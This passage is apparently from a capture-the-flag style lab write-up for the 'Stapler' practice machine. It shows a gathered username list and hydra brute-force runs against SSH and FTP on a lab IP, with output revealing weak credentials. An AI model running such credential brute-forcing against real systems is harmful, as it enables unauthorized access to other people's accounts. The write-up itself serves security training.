Brute-Force Attack


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cat users.txt              
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
www
elly
john
harry
kathy
fred
Zoe
Tim
Barry
dave
Abby
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cat users.txt | wc -l

A total of 39 usernames have been collected from various sources, including FTP, Samba, Web servers and ZIP archive.

While no password is known at this time, i will attempt to perform a brute-force attack with hydra with the -e nsr flag to check for null password, username as password, and reversed username as password.

SSH


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ hydra -L users.txt -e nsr ssh://$IP -t 64      
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-28 22:17:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:37/p:3), ~2 tries per task
[DATA] attacking ssh://192.168.239.148:22/
[22][ssh] host: 192.168.239.148   login: SHayslett   password: SHayslett
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-28 22:18:24

Found a valid SSH credential for the SHayslett user; SHayslett

FTP


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ hydra -L users.txt -e nsr ftp://$IP -t 64 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-28 23:36:25
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:37/p:3), ~2 tries per task
[DATA] attacking ftp://192.168.239.148:21/
[21][ftp] host: 192.168.239.148   login: SHayslett   password: SHayslett
[21][ftp] host: 192.168.239.148   login: elly   password: ylle
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-28 23:36:37

Found 2 valid FTP credentials;

  • SHayslett:SHayslett
  • elly:ylle